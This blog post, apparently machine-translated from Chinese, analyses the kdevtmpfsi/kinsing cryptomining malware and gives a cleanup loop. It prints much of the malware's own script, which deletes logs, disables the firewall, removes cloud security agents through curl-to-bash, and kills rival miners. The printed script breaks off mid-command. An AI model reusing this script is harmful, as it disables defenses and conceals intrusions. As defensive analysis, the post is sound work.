当前位置:网站首页>Analysis and cleaning of kdevtmpfsi virus content
Analysis and cleaning of kdevtmpfsi virus content
2022-06-25 20:44:00 【Chengshaoting】
kdevtmpfsi and networkmanger I have seen a mild virus so far . It is hard to imagine , In the company's testing environment Two projects were infected with viruses But the basic performance is the same . The old bird of the company said that the company specialized in bitcoin mining has this intrusion technology , These viruses should be their little demo, Once the virus is added to the intranet for horizontal transmission 、 Multiple back doors 、 modify linux System commands 、 Switch processes back and forth pid And the process file name may be difficult to handle without reinstalling the system
Poisoning symptoms :
- The server cpu Load rise top Check the process You'll find one called kdevtmpfsi Your program is taking up
- After killing and restarting, it can be inferred that there are daemons
- Kill the daemon Restart after a while There are scripts executing every second in the scheduled task To delete
- Make a comeback after a week or two
Suggest
Mining procedures can be done through docker Image download service or through redis Dynamic load configuration By brute force redis Password intrusion server
1、 The middleware should be bound to the intranet card , prohibit bind 0.0.0.0 The situation of
2、 Start with a low privileged user
3、 Replace common ports uniformly
4、redis Set at least 20 Bit strong password ,
5、 Disable dangerous commands such as :
rename-command FLUSHALL “”
rename-command FLUSHDB “”
rename-command CONFIG “”
rename-command EVAL “”
For killing kdevtmpfsi and networkmanger Mining script
It is necessary to say two words :
1、 Scripts do not completely eradicate viruses , This virus may have invaded the system kernel , As long as the server does not redo the system , There may also be a risk of being recruited again . But if the virus wants to mine, it will start the program My script is a process that kills viruses every once in a while 、 Delete virus files 、 Clear the scheduled task , It can be regarded as a cure for headache and foot pain .
2、 If you don't have time to rebuild the middleware The developer doesn't have time to conduct joint commissioning with you , I think this script is a better method at present
3、 Because the script will clear the scheduled task , So there is linux Set the old iron for other scheduled tasks You need to modify the part of the scheduled task yourself I will explain how to modify
vim killwakuang.sh
#!/bin/bash
# Create a loop I thought I was going to empty crontab Therefore, the system's own scheduled tasks are not used
while [ "1" -eq "1" ]
do
# Kill these processes directly networkmanager I don't know much at present There should be another one networkservice Daemons and so on
/usr/bin/pkill -f networkmanager
/usr/bin/pkill -f kinsing
/usr/bin/pkill -f kdevtmpfsi
# Start deleting files If so, delete the document This is about kinsing Of
# He will run a program called kdevtmpfsi Subroutines Use this program to add its malicious program to the scheduled task
# The malicious mining program downloaded is called kinsing This is a daemon. If a child process hangs, it will restart
if [ -e /tmp/kinsing ]; then
rm -rf /tmp/kinsing
fi
if [ -e /tmp/kdevtmpfsi ]; then
rm -rf /tmp/kdevtmpfsi
fi
if [ -e /etc/kinsing ]; then
rm -rf /etc/kinsing
fi
# This is for networkmanager、 There are many documents
if [ -e /tmp/networkmanager ]; then
rm -rf /tmp/networkmanager
fi
if [ -e /tmp/newdat.sh ]; then
rm -rf /tmp/newdat.sh
fi
if [ -e /tmp/phpguard ]; then
rm -rf /tmp/phpguard
fi
if [ -e /tmp/phpupdate ]; then
rm -rf /tmp/phpupdate
fi
if [ -e /tmp/config.json ]; then
rm -rf /tmp/config.json
fi
# This is networkmanager Binary files of and with og Log file at the end
for i in `ls /tmp/kow* 2>/dev/null` ;do rm -rf $i ; done
for i in `ls /tmp/*og 2>/dev/null` ;do rm -rf $i ; done
### Our company doesn't have to do regular tasks It was cleared away directly This script can be written into a scheduled task when it is executed by any user
# Those who have their own scheduled tasks can use the scheduled tasks belonging to the virus awk Filter out Then write back your company's scheduled tasks
crontab -l > conf && echo > conf && crontab conf && rm -f conf
# every other 50 Once per second
sleep 50
done
Virus file analysis
#!/bin/sh
# Set an optimal file opening number for the system
ulimit -n 65535
### Delete the system log to prevent tracing
rm -rf /var/log/syslog
## Cancel /tmp Remove all locked documents
chattr -iua /tmp/
chattr -iua /var/tmp/
# Turn off the firewall Ubantu and linux Of So as not to affect communication with the outside world
ufw disable
iptables -F
#
echo "nope" >/tmp/log_rot
# Ban NMI watchdog The normal system is on References :http://www.360doc.com/content/19/0618/10/38701044_843262892.shtml
sudo sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
# Here you will find that it modifies the kernel parameters Prevent the watchdog from turning it off The expectation is 1
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
userdel akay
userdel vfinder
chattr -iae /root/.ssh/
chattr -iae /root/.ssh/authorized_keys
rm -rf /tmp/addres*
rm -rf /tmp/walle*
rm -rf /tmp/keys
# Turn off the Alibaba cloud process
if ps aux | grep -i '[a]liyun'; then
# Even the address of the Alibaba cloud script is very clear. I suspect that the Alibaba cloud people did it themselves. Hahaha
curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
# For Baidu cloud BCM Monitoring service scripts
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
# The monitoring service for Qingyun is stopped
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
# part ip It is used by their competitive products company ip If we find their progress number, we will kill them
netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :23 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :143 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :2222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :3389 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :4444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :6665 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :6667 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :8444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :14444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :14433 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :13531 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
# The more you write, the more angry you get Find my server cpu The occupancy rate is greater than 80% And turn it off (kdevtmpfsi With the exception of ) So as not to affect mining services I said on my server es and jenkins Why do you always hang up
ps aux | grep -vw kdevtmpfsi | grep -v grep | awk '{if($3>80.0) print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep ':3333' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep ':5555' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kworker -c\' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'log_' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'systemten' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'netns' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'voltuned' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'darwin' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/dl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/ddg' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/pprt' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/ppol' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/65ccE*' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/jmx*' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/2Ne80*' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '45.76.122.92' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '51.38.191.178' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '51.15.56.161' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '86s.jpg' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'aGTSGJJp' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'nMrfmnRa' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'PuNY5tm2' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'I0r8Jyyt' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'AgdgACUD' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'uiZvwxG8' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'hahwNEdB' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'BtwXn5qH' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '3XEzey2T' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 't2tKrCSZ' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'HD7fcBgg' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'zXcDajSs' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '3lmigMo' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'AkMK4A2' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'AJ2AkKe' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'HiPxCJRS' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC030' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC031' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC032' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC033' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "C4iLM4L" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | awk '{
if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/boot/vmlinuz' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "i4b503a52cc5" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "2g0uv7npuhrlatd" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "nqscheduler" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "rkebbwgqpl4npmm" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep "]" | awk '$3>10.0{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "0kwti6ut420t" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk 'length($11)>19{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "\[^" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "rsync" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "watchd0g" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "/tmp/java" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'gitee.com' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/java' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '104.248.4.162' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '89.35.39.78' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/dev/shm/z3.sh' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kthrotlds' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'ksoftirqds' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'netdns' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'watchdogs' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v root | grep -v dblaunch | grep -v dblaunchs | grep -v dblaunched | grep -v apache2 | grep -v atd | grep -v kdevtmpfsi | awk '$3>80.0{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep " ps" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs -I % kill -9 % ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep "x]" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep "sh] <" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep " \[]" | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/l.sh' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'hahwNEdB' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'CnzFVPLF' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'CvKzzZLs' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/udevd' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'sustse' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'sustse3' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'mr.sh' | grep 'wget' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'mr.sh' | grep 'curl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '2mr.sh' | grep 'wget' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '2mr.sh' | grep 'curl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'cr5.sh' | grep 'wget' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'cr5.sh' | grep 'curl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'j2.conf' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '107.174.47.156' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '83.220.169.247' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '51.38.203.146' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '144.217.45.45' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '107.174.47.181' | awk '{
print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '176.31.6.16' | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "pool.t00ls.ru" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "[email protected]" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "monerohash.com" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep xiaoyao | awk '{
print $2}' | xargs -I % kill -9 % ps auxf | grep xiaoxue | awk '{
print $2}' | xargs -I % kill -9 % netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{
print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 % netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{
print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 % pgrep -f monerohash | xargs -I % kill -9 % pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 % pgrep -f xzpauectgr | xargs -I % kill -9 % pgrep -f slxfbkmxtd | xargs -I % kill -9 % pgrep -f mixtape | xargs -I % kill -9 % pgrep -f addnj | xargs -I % kill -9 % pgrep -f 200.68.17.196 | xargs -I % kill -9 % pgrep -f IyEvYmluL3NoCgpzUG | xargs -I % kill -9 % pgrep -f KHdnZXQgLXFPLSBodHRw | xargs -I % kill -9 % pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | xargs -I % kill -9 % pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | xargs -I % kill -9 % pgrep -f mwyumwdbpq.conf | xargs -I % kill -9 % pgrep -f honvbsasbf.conf | xargs -I % kill -9 % pgrep -f mqdsflm.cf | xargs -I % kill -9 % pgrep -f stratum | xargs -I % kill -9 % pgrep -f lower.sh | xargs -I % kill -9 % pgrep -f ./ppp | xargs -I % kill -9 % pgrep -f cryptonight | xargs -I % kill -9 % pgrep -f ./seervceaess | xargs -I % kill -9 % pgrep -f ./servceaess | xargs -I % kill -9 % pgrep -f ./servceas | xargs -I % kill -9 % pgrep -f ./servcesa | xargs -I % kill -9 % pgrep -f ./vsp | xargs -I % kill -9 % pgrep -f ./jvs | xargs -I % kill -9 % pgrep -f ./pvv | xargs -I % kill -9 % pgrep -f ./vpp | xargs -I % kill -9 % pgrep -f ./pces | xargs -I % kill -9 % pgrep -f ./rspce | xargs -I % kill -9 % pgrep -f ./haveged | xargs -I % kill -9 % pgrep -f ./jiba | xargs -I % kill -9 % pgrep -f ./watchbog | xargs -I % kill -9 % pgrep -f ./A7mA5gb | xargs -I % kill -9 % pgrep -f kacpi_svc | xargs -I % kill -9 % pgrep -f kswap_svc | xargs -I % kill -9 % pgrep -f kauditd_svc | xargs -I % kill -9 % pgrep -f kpsmoused_svc | xargs -I % kill -9 % pgrep -f kseriod_svc | xargs -I % kill -9 % pgrep -f kthreadd_svc | xargs -I % kill -9 % pgrep -f ksoftirqd_svc | xargs -I % kill -9 % pgrep -f kintegrityd_svc | xargs -I % kill -9 % pgrep -f jawa | xargs -I % kill -9 % pgrep -f oracle.jpg | xargs -I % kill -9 % pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | xargs -I % kill -9 % pgrep -f 188.209.49.54 | xargs -I % kill -9 % pgrep -f 181.214.87.241 | xargs -I % kill -9 % pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | xargs -I % kill -9 % pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | xargs -I % kill -9 % pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | xargs -I % kill -9 % pgrep -f servim | xargs -I % kill -9 % pgrep -f kblockd_svc | xargs -I % kill -9 % pgrep -f native_svc | xargs -I % kill -9 % pgrep -f ynn | xargs -I % kill -9 % pgrep -f 65ccEJ7 | xargs -I % kill -9 % pgrep -f jmxx | xargs -I % kill -9 % pgrep -f 2Ne80nA | xargs -I % kill -9 % pgrep -f sysstats | xargs -I % kill -9 % pgrep -f systemxlv | xargs -I % kill -9 % pgrep -f watchbog | xargs -I % kill -9 % pgrep -f OIcJi1m | xargs -I % kill -9 % pkill -f biosetjenkins pkill -f Loopback pkill -f apaceha pkill -f cryptonight pkill -f stratum pkill -f mixnerdx pkill -f performedl pkill -f JnKihGjn pkill -f irqba2anc1 pkill -f irqba5xnc1 pkill -f irqbnc1 pkill -f ir29xc1 pkill -f conns pkill -f irqbalance pkill -f crypto-pool pkill -f XJnRj pkill -f mgwsl pkill -f pythno pkill -f jweri pkill -f lx26 pkill -f NXLAi pkill -f BI5zj pkill -f askdljlqw pkill -f minerd pkill -f minergate pkill -f Guard.sh pkill -f ysaydh pkill -f bonns pkill -f donns pkill -f kxjd pkill -f Duck.sh pkill -f bonn.sh pkill -f conn.sh pkill -f kworker34 pkill -f kw.sh pkill -f pro.sh pkill -f polkitd pkill -f acpid pkill -f icb5o pkill -f nopxi pkill -f irqbalanc1 pkill -f minerd pkill -f i586 pkill -f gddr pkill -f mstxmr pkill -f ddg.2011 pkill -f wnTKYg pkill -f deamon pkill -f disk_genius pkill -f sourplum pkill -f polkitd pkill -f nanoWatch pkill -f zigw pkill -f devtool pkill -f devtools pkill -f systemctI pkill -f watchbog pkill -f cryptonight pkill -f sustes pkill -f xmrig pkill -f xmrig-cpu pkill -f 121.42.151.137 pkill -f sysguard pkill -f networkservice pkill -f sysupdate pkill -f init12.cfg pkill -f nginxk pkill -f tmp/wc.conf pkill -f xmrig-notls pkill -f xmr-stak pkill -f suppoie pkill -f zer0day.ru pkill -f dbus-daemon--system pkill -f nullcrew pkill -f systemctI pkill -f kworkerds pkill -f init10.cfg pkill -f /wl.conf pkill -f crond64 pkill -f sustse pkill -f vmlinuz pkill -f exin pkill -f apachiii rm -rf /usr/bin/config.json rm -rf /usr/bin/exin killall log_rot pkill -f log_rot ## Delete the startup file left by the competitive product company rm -rf /tmp/wc.conf rm -rf /tmp/log_rot rm -rf /tmp/apachiii rm -rf /tmp/sustse rm -rf /tmp/php rm -rf /tmp/p2.conf rm -rf /tmp/pprt rm -rf /tmp/ppol rm -rf /tmp/javax/config.sh rm -rf /tmp/javax/sshd2 rm -rf /tmp/.profile rm -rf /tmp/1.so rm -rf /tmp/kworkerds rm -rf /tmp/kworkerds3 rm -rf /tmp/kworkerdssx rm -rf /tmp/xd.json rm -rf /tmp/syslogd rm -rf /tmp/syslogdb rm -rf /tmp/65ccEJ7 rm -rf /tmp/jmxx rm -rf /tmp/2Ne80nA rm -rf /tmp/dl rm -rf /tmp/ddg rm -rf /tmp/systemxlv rm -rf /tmp/systemctI rm -rf /tmp/.abc rm -rf /tmp/osw.hb rm -rf /tmp/.tmpleve rm -rf /tmp/.tmpnewzz rm -rf /tmp/.java rm -rf /tmp/.omed rm -rf /tmp/.tmpc rm -rf /tmp/.tmpleve rm -rf /tmp/.tmpnewzz rm -rf /tmp/gates.lod rm -rf /tmp/conf.n rm -rf /tmp/update.sh rm -rf /tmp/devtool rm -rf /tmp/devtools rm -rf /tmp/fs rm -rf /tmp/.rod rm -rf /tmp/.rod.tgz rm -rf /tmp/.rod.tgz.1 rm -rf /tmp/.rod.tgz.2 rm -rf /tmp/.mer rm -rf /tmp/.mer.tgz rm -rf /tmp/.mer.tgz.1 rm -rf /tmp/.hod rm -rf /tmp/.hod.tgz rm -rf /tmp/.hod.tgz.1 rm -rf /tmp/84Onmce rm -rf /tmp/C4iLM4L rm -rf /tmp/lilpip rm -rf /tmp/3lmigMo rm -rf /tmp/am8jmBP rm -rf /tmp/tmp.txt rm -rf /tmp/baby rm -rf /tmp/.lib rm -rf /tmp/systemd rm -rf /tmp/lib.tar.gz rm -rf /tmp/baby rm -rf /tmp/java rm -rf /tmp/j2.conf rm -rf /tmp/.mynews1234 rm -rf /tmp/a3e12d rm -rf /tmp/.pt rm -rf /tmp/.pt.tgz rm -rf /tmp/.pt.tgz.1 rm -rf /tmp/go rm -rf /tmp/java rm -rf /tmp/j2.conf rm -rf /tmp/.tmpnewasss rm -rf /tmp/java rm -rf /tmp/go.sh rm -rf /tmp/go2.sh rm -rf /tmp/khugepageds rm -rf /tmp/.censusqqqqqqqqq rm -rf /tmp/.kerberods rm -rf /tmp/kerberods rm -rf /tmp/seasame rm -rf /tmp/touch rm -rf /tmp/.p rm -rf /tmp/runtime2.sh rm -rf /tmp/runtime.sh rm -rf /dev/shm/z3.sh rm -rf /dev/shm/z2.sh rm -rf /dev/shm/.scr rm -rf /dev/shm/.kerberods rm -f /etc/ld.so.preload rm -f /usr/local/lib/libioset.so chattr -i /etc/ld.so.preload rm -f /etc/ld.so.preload rm -f /usr/local/lib/libioset.so # This is another virus disguised as a watchdog rm -rf /tmp/watchdogs rm -rf /etc/cron.d/tomcat rm -rf /etc/rc.d/init.d/watchdogs rm -rf /usr/sbin/watchdogs rm -f /tmp/kthrotlds rm -f /etc/rc.d/init.d/kthrotlds rm -rf /tmp/.sysbabyuuuuu12 rm -rf /tmp/logo9.jpg rm -rf /tmp/miner.sh rm -rf /tmp/nullcrew rm -rf /tmp/proc rm -rf /tmp/2.sh # utilize confluence Spread the virus rm /opt/atlassian/confluence/bin/1.sh rm /opt/atlassian/confluence/bin/1.sh.1 rm /opt/atlassian/confluence/bin/1.sh.2 rm /opt/atlassian/confluence/bin/1.sh.3 rm /opt/atlassian/confluence/bin/3.sh rm /opt/atlassian/confluence/bin/3.sh.1 rm /opt/atlassian/confluence/bin/3.sh.2 rm /opt/atlassian/confluence/bin/3.sh.3 # This is networkmanger Mining virus rm -rf /var/tmp/f41 rm -rf /var/tmp/2.sh rm 